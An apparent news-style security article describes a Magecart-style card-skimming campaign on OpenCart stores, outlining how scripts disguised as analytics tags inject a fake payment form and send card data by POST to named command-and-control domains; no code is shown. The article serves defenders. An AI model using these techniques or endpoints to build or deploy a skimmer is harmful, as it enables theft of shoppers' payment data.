Understanding the Magecart-Style Attack on OpenCart Websites
A new wave of cyber threats has emerged, targeting e-commerce websites that use the OpenCart content management system (CMS). This attack follows a pattern similar to the well-known Magecart attacks, where malicious code is injected into online stores to steal sensitive customer data. The latest incident involves the injection of malware that mimics trusted tracking scripts, making it particularly difficult to detect.
The attackers have been stealthily embedding malicious JavaScript into landing pages, hiding their payload within legitimate analytics and marketing tags such as Facebook Pixel, Meta Pixel, and Google Tag Manager. This method allows the malware to blend in with normal website activity, reducing the chances of detection by standard security measures.
Obfuscation Techniques and Script Injection
One of the key features of this campaign is the use of obfuscation techniques to evade detection. The malicious code encodes payload URLs using Base64 and routes traffic through suspicious domains such as /tagscart.shop/cdn/analytics.min.js. At first glance, these scripts appear to be standard Google Analytics or Tag Manager snippets, but upon closer inspection, they reveal their true nature.
Once decoded and executed, the script dynamically creates a new element and inserts it before existing scripts. This action triggers additional malicious code, which then executes heavily obfuscated JavaScript. Techniques such as hexadecimal references, array recombination, and the eval() function are used for dynamic decoding, further complicating the detection process.
Fake Payment Forms and Credential Theft
The primary objective of this malware is to inject a fake credit card form during the checkout process. The form is designed to look identical to the legitimate one, capturing critical information such as the credit card number, expiration date, and CVC. Listeners are attached to events like blur, keydown, and paste, ensuring that user input is captured at every stage of the transaction.
Importantly, the attack does not rely on clipboard scraping, meaning users must manually enter their card details. After submission, the stolen data is immediately sent via POST requests to two command-and-control (C2) domains: //ultracart[.]shop/g.php and //hxjet.pics/g.php.
In a more insidious move, the original payment form is hidden once the card information is submitted. A second page then prompts users to enter further bank transaction details, increasing the risk of additional data theft.
Delayed Data Usage and Increased Risk
What sets this attack apart is the unusually long delay in using the stolen card data. Instead of being exploited within a few days, the data remained dormant for several months. One card was used on June 18 in a pay-by-phone transaction from the US, while another was charged €47.80 to an unidentified vendor.
This delay highlights the evolving tactics of cybercriminals, who are becoming more patient and strategic in their operations. It also underscores the growing risks associated with SaaS-based e-commerce platforms, where CMS solutions like OpenCart can become prime targets for advanced malware.
The Need for Enhanced Security Measures
The breach emphasizes the importance of implementing stronger security measures beyond basic firewalls. Automated platforms such as c/side claim to detect threats by identifying obfuscated JavaScript, unauthorized form injections, and anomalous script behavior. However, as attackers continue to evolve, even small CMS deployments must remain vigilant.
Real-time monitoring and threat intelligence should no longer be optional for e-commerce vendors aiming to protect their customers’ trust. Cybersecurity is an ongoing effort, and staying ahead of emerging threats requires constant adaptation and improvement of security protocols.
Conclusion
As the digital landscape continues to expand, so do the methods used by cybercriminals. The recent OpenCart attack serves as a stark reminder of the need for proactive security measures. By understanding the tactics employed in these attacks and implementing robust defenses, e-commerce businesses can better protect themselves and their customers from falling victim to similar threats.